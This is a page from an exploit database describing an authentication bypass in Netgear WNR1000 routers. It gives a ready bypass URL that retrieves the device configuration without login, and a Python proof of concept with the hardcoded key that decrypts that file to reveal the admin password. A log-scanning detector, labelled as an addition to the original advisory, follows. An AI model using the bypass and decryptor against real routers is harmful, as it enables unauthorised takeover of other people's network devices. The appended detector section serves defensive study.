0day.today - Biggest Exploit Database in the World.
Netgear WNR1000 - Authentication Bypass
The web server running on the affected devices is subject to an authentication bypass issue that allows an attacker to gain administrative access, circumventing the existing authentication mechanisms. Strictly speaking, the web server skips authentication checks for some URLs, such as those that contain the substring ".jpg" (without quotes). As a consequence, an attacker can retrieve the current device configuration by accessing the following URL:

http://<target-ip-address>/NETGEAR_fwpt.cfg?.jpg

The resulting configuration file is encrypted. However, the device implements a trivial encryption scheme that can be reversed quite easily. From the configuration file, attackers can extract, among other things, the clear-text password for the "admin" user.

A Python procedure that reverses the aforementioned encryption scheme follows (the code of this PoC is inefficient and is quite a mess):

<cut>
import sys
import pyDes

# Encryption key is a slight variation of "NtgrBak". The first byte is
# advanced by 8 before every block (see main), so the stored value is 8
# below the one actually used for the first block.
KEY = [0x56 - 8, 0x74, 0x67, 0x72, 0x42, 0x61, 0x6b, 0x00]


def derive_des_key(ascii_key):
    # Split the 56-bit key into eight 7-bit groups and left-align each group
    # in its own byte; the low (DES parity) bit is cleared.
    def extract_by_offset(offset):
        byte_index = offset >> 3
        bit_index = byte_index << 3
        v0 = (ascii_key[byte_index] << 8) | ascii_key[byte_index + 1]
        v1 = 8 - (offset - bit_index)
        v0 >>= v1
        return v0 & 0xfe

    return bytes(extract_by_offset(i) for i in range(0, 7 * 8, 7))


def decrypt_block(block, key_bytes):
    # Each 8-byte block is decrypted with single DES in ECB mode.
    des = pyDes.des(derive_des_key(key_bytes), pyDes.ECB)
    return des.decrypt(block)


def main():
    # Read the encrypted configuration from stdin as raw bytes; it must be a
    # whole number of DES blocks.
    data = sys.stdin.buffer.read()
    assert (len(data) % 8) == 0
    current_key = KEY[:]
    r = b""
    for i in range(0, len(data), 8):
        # Per-block key schedule: the first key byte advances by 8 for every
        # block, carrying into the second byte on overflow.
        current_key[0] += 8
        if current_key[0] > 0xff:
            current_key[0] -= 0x100
            current_key[1] += 1
        r += decrypt_block(data[i:i + 8], current_key)
    sys.stdout.buffer.write(r)


if __name__ == "__main__":
    main()
</cut>

# 0day.today [2024-09-28] #
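As an added defensive example, not part of the original advisory, the following Python scans web-server access-log lines for the extension-based authentication skip described above: requests whose raw URL contains ".jpg" while the actual path does not end in it. The common log format and the sample entries are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Sep/2024:10:01:02 +0000] "GET /images/logo.jpg HTTP/1.1" 200 1234
10.0.0.9 - - [28/Sep/2024:10:01:07 +0000] "GET /NETGEAR_fwpt.cfg?.jpg HTTP/1.1" 200 4096
10.0.0.9 - - [28/Sep/2024:10:01:09 +0000] "GET /cgi-bin/status.cgi?x=.jpg HTTP/1.1" 200 512
10.0.0.5 - - [28/Sep/2024:10:01:12 +0000] "GET /start.htm HTTP/1.1" 401 0
"""

# Minimal common-log-format matcher: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def is_extension_spoof(url, marker=".jpg"):
    """True when the marker appears anywhere in the URL (query string
    included) but the real path component does not end with it. A genuine
    image request ends its path with the marker; the bypass only places it
    in the query string to trick the extension-based auth check."""
    lowered = url.lower()
    path = urlsplit(lowered).path
    return marker in lowered and not path.endswith(marker)


def scan_log(text):
    """Return (ip, url, status) for every request matching the spoof pattern.
    A 200 status on a flagged request means the server served the resource
    without authentication."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if is_extension_spoof(m["url"]):
            hits.append((m["ip"], m["url"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, url, status in scan_log(SAMPLE_LOG):
        print(f"suspicious request from {ip}: {url} -> {status}")
```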